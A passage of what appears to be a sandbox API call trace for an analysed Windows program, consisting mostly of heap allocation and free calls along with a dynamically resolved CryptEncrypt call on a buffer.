Size=0x10) returned 0x2e50b30 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0205.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb000) returned 0x2e80330 [0205.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0205.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0205.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0205.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0205.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0205.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0205.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0205.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0205.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0205.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0205.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0205.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0205.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0205.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0205.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e509f8 [0205.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0205.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.863] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0205.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54440 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0205.864] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xb000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xb008) returned 1 [0205.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0205.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0205.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0205.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0205.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0205.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0205.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0205.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0205.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0205.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.868] CharLowerBuffW (in: lpsz="byte[45064]", cchLength=0xb | out: lpsz="byte[45064]") returned 0xb [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 